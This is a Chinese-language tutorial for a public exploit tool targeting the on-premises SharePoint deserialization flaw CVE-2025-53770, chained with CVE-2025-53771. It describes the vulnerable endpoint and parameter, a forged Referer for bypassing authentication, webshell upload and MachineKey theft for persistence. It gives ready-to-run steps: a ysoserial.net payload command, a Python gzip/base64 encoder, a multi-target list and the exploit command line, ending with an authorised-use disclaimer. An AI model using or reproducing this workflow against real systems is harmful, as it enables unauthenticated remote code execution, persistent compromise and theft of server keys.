漏洞概述

GitHub 项目：
soltanali0/CVE-2025-53770-Exploit 是一个针对 Microsoft SharePoint（本地部署版本）WebPart 注入漏洞的利用工具。该工具通过向 ToolPane.aspx 端点发送恶意 WebPart 有效负载，利用不安全的 .NET 反序列化机制实现远程代码执行（RCE）。

• 目标组件：Microsoft SharePoint（本地部署版本，包括 SharePoint Server 2016、2019 和 Subscription Edition）
• 漏洞端点：/_layouts/15/ToolPane.aspx
• 漏洞参数：MSOTlPn_DWP
• 漏洞对象：<Scorecard:ExcelDataSet> 的 CompressedDataTable 属性
• 漏洞类型：不安全的反序列化（Insecure Deserialization）
• 影响：允许攻击者实现远程代码执行（RCE），无需认证（结合 CVE-2025-53771）。
• CVSS 分数：9.8（严重）
• 受影响版本：SharePoint Server 2016、2019 和 Subscription Edition（SharePoint Online 不受影响）。

soltanali0/CVE-2025-53770-Exploit利用工具的工作原理

该工具通过以下步骤利用 CVE-2025-53770 漏洞：

1、检查目标端点：

• 通过 check_toolpane 函数检查 /_layouts/15/ToolPane.aspx 是否可访问（HTTP 状态码 200）。

2、构造恶意 WebPart：

• 使用 GZIP 压缩的 .NET 序列化对象（一般由 ysoserial.net 生成）嵌入到 CompressedDataTable 属性。有效负载包装在 XML 格式的 WebPart 中，包含在 MSOTlPn_DWP 参数内。

3、发送恶意请求：

• 通过 send_exploit 函数向 /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx 发送 POST 请求。设置伪造的 Referer 头（/_layouts/SignOut.aspx）以绕过认证检查（结合 CVE-2025-53771）。

4、触发反序列化：

• SharePoint 解析 MSOTlPn_DWP 中的 XML，并反序列化 CompressedDataTable 的 GZIP 数据。使用不安全的反序列化器（如 LosFormatter），触发 ObjectDataProvider 等 Gadget 链，执行任意代码。

5、持久化访问：

• 上传恶意 .aspx 文件（如 spinstall0.aspx，这个文件有被捕获过）到服务器路径。窃取 MachineKey（ValidationKey 和 DecryptionKey）以伪造认证令牌。

Content of spinstall0.aspx

工具使用步骤

1、环境准备：

• 安装 Python 3.x 及依赖库：

python3 -m venv vnev
source vnev/bin/activate
cd CVE-2025-53770-Exploit/
pip install -r requirements.txt

• 使用 ysoserial.net 生成有效负载，以下是执行计算器的示例，也可以直接生成aspx的webshell。

ysoserial.exe -f LosFormatter -g TextFormattingRunProperties -o base64 -c "calc.exe"
//将输出内容保存为payload.b64

• GZIP 压缩并编码生成payload.txt。

import gzip, base64
with open("payload.b64", "rb") as f:
    decoded = base64.b64decode(f.read())
    compressed = gzip.compress(decoded)
    with open("payload.txt", "w") as out:
        out.write(base64.b64encode(compressed).decode())

2、准备目标列表：

• 创建 targets.txt，每行一个目标 URL，例如：

 http://example.com
http://sharepoint.target.com

3、运行工具：

• 执行命令：（payload.txt就是上边python代码生成的）

python3 exploit.py -t targets.txt –file payload.txt –proxy http://127.0.0.1:8080

• 参数说明：
• -t：目标列表文件
• –file：GZIP 压缩有效负载文件
• –data：（可选）直接提供 base64 编码的压缩有效负载
• –proxy：（可选）HTTP 代理地址

4、检查结果：

• 工具检查 ToolPane.aspx 端点并发送恶意请求。确认是否成功（例如，检查是否执行 calc.exe 或生成 spinstall0.aspx）。

漏洞影响极大。

法律与道德声明

此工具仅用于教育目的或合法授权的渗透测试。在未经授权的系统上使用是非法的，可能导致严重法律后果。请确保获得测试许可并遵循负责任的披露原则。